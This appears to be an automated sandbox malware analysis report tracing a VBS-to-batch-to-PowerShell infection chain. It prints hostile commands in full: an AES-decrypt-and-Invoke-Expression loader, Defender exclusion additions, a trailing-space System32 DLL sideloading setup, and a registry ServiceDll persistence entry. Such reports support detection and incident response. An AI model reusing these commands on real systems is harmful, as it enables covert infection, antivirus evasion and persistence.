    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError,46_2_00007FFA41850008

    Software Vulnerabilities

    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficTCP traffic: 192.168.2.17:49730 -> 20.71.50.126:5432
    Source: global trafficHTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
    Source: Joe Sandbox ViewIP Address: 213.188.196.246 213.188.196.246
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: unknownDNS query: name: ipinfo.io
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE61C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark,46_2_00007FFA2CE61C20
    Source: global trafficHTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: global trafficDNS traffic detected: DNS query: worldtimeapi.org
    Source: global trafficDNS traffic detected: DNS query: universalsqlserver.postgres.database.azure.com
    Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: svchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: svchost.exe, 0000002E.00000002.2347123421.00000224C242B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe.31.dr, x338625.dat.31.dr, usvc.dat.31.drString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
    Source: console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.drString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
    Source: console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCnB
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: svchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
    Source: svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.drString found in binary or memory: http://www.gnu.org/licenses/
    Source: console_zero.exeString found in binary or memory: http://www.zlib.net/
    Source: console_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.drString found in binary or memory: http://www.zlib.net/D
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: console_zero.exeString found in binary or memory: https://curl.se/
    Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/V
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
    Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/hsts.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
    Source: svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
    Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
    Source: svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
    Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
    Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
    Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
    Source: svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
    Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: svchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.dr | String found in binary or memory: https://ipinfo.io/json
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
    Source: svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
    Source: svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.dr | String found in binary or memory: https://www.gnu.org/licenses/
    Source: svchost.exe | String found in binary or memory: https://www.openssl.org/
    Source: svchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.dr | String found in binary or memory: https://www.openssl.org/H
    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
    Source: C:\Program Files\7-Zip\7zFM.exe | Window created: window name: CLIPBRDWNDCLASS
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,51_2_00007FFA330F1180

    System Summary

    Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: x447823.zip.16.dr | Zip Entry: x447823.vbs
    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00007FFA2CF15730: CreateDirectoryA,CreateFileA,GetLastError,strchr,strchr,MultiByteToWideChar,DeviceIoControl,GetLastError,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,RemoveDirectoryA,_errno,CloseHandle,46_2_00007FFA2CF15730
    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: C:\Windows\System32\cmd.exe | File created: C:\Windows
    Source: C:\Windows\System32\cmd.exe | File created: C:\Windows \System32
    Source: C:\Windows\System32\cmd.exe | File created: C:\Windows \System32\010101
    Source: C:\Windows\System32\xcopy.exe | File created: C:\Windows \System32\printui.exe
    Source: C:\Windows\System32\xcopy.exe | File created: C:\Windows \System32\x249569.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\usvc.dat
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\winsvcf
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\winsvcf\winlogsvc
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libcurl.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\zlib1.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libcrypto-3-x64.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libiconv-2.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libintl-9.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libssl-3-x64.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libwinpthread-1.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\console_zero.exe
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\libpq.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\ucrtbased.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\vcruntime140d.dll
    Source: C:\Windows \System32\printui.exe | File created: C:\Windows\System32\x338625.dat
    Source: C:\Windows\System32\cmd.exe | File deleted: C:\Windows \System32\010101
    Source: Joe Sandbox View Dropped File: C:\Windows\System32\libcrypto-3-x64.dll DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
    Source: libiconv-2.dll.31.dr Static PE information: Number of sections : 20 > 10
    Source: libintl-9.dll.31.dr Static PE information: Number of sections : 20 > 10
    Source: libwinpthread-1.dll.31.dr Static PE information: Number of sections : 12 > 10
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engine Classification label: mal100.expl.evad.win7Z@86/50@3/4
    Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF13E00 LoadLibraryExA,GetLastError,memset,FormatMessageA,strerror,libintl_gettext
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4388:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1112:120:WilError_03
    Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2828:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
    Source: C:\Program Files\7-Zip\7zFM.exe File created: C:\Users\user\AppData\Local\Temp\7zE4809A201
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe
    Source: unknown Process created: C:\Windows\explorer.exe
    Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: F.7z ReversingLabs: Detection: 27%
    Source: F.7z Virustotal: Detection: 31%
    Source: svchost.exe String found in binary or memory: -start
    Source: svchost.exe String found in binary or memory: -addr
    Source: svchost.exe String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
    Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
    Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
    Source: unknown Process created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive"
    Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
